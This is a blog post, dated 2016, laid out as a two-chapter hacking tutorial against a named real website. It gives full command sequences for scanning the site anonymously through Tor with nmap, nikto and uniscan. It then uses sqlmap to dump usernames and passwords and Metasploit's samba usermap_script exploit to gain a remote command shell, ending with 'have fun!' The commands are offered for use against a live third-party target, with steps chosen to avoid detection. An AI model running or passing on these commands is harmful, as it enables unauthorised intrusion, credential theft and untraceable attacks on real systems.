Saturday, February 20, 2016

Friday, February 5, 2016

Hacking with Kali and friends - Exploitorama

Scan the ip with nmap + proxychains to route it over tor;

anon@1337-817chs:~$sudo proxychains nmap -v -Pn -Ss -T4 -A -p 1-65535 104.28.##.105

Scan the site with nikto and uniscan + proxychains to route it over tor;


anon@1337-817chs:~$sudo proxychains nikto -h www.Jihadist.ps && proxychains nikto -h 104.28.##.105

anon@1337-817chs:~$sudo proxychains ./uniscan -u https://www.Jihadist.ps/



that will take awhile...check on your sqlmap results from chapter 1

any usernames or passwords? ooh goody...
on too metasploit!!


The following info should have been obtained with the help of the tor cloaked scanning 

Target ip (from nslookup) 104.28.##.105
Target OS and Version (from nmap set to zero ping "-Pn" to avoid detection The
 -Ss option tells nmap to perform a stealth scan, the -A option tells it to try to discover OS)
kick it oldschool by googling  "OS version Exploit Metasploit" to check for any quick exploit modules in Metasploit. 

 We need to find out the OS and ports and services running on the target system.
Once you find the open ports and service like a samba port its party time.

Fire up Metasploit 
anon@1337-817chs:~$msfconsole

Route it through TOR
msf >set Proxies socks5:127.0.0.1:9050


We need to find the version of samba..

msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) >set RHOST 104.28.##.105
RHOST => 104.28.##.105
msfauxiliary(smb_version) >set RPORT 445
RPORT => 445
msfauxiliary(smb_version) >exploit

With version in hand, restart msfconsole now we use the appropriate module...

anon@1337-817chs:~$msfconsole
msf >set Proxies socks5:127.0.0.1:9050
msf >use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 104.28.##.105
msf exploit(usermap_script) >exploit


We now have a command shell on the target box... have fun!



Hacking Servers with Kali and friends - Chapter 1; Sql injection with sqlmap

look up target ip address (write the following info down);
anon@1337-817chs:~$ nslookup www.Jihadist.ps

Server:        8.8.8.8
Address:    8.8.8.8#53

Non-authoritative answer:
www.Jihadist.ps    canonical name = Jihadist.ps.
Name:    Jihadist.ps
Address: 104.28.##.105
Name:    Jihadist.ps
Address: 104.28.##.105

make sure tor is installed and running.
run sqlmap over tor with random user agent at target page for usernames and passwords;

anon@1337-817chs:~$sudo sqlmap --tor --random-agent -a --url=http://forums.Jihadist.ps

that will take awhile on to Metasploit in chapter 2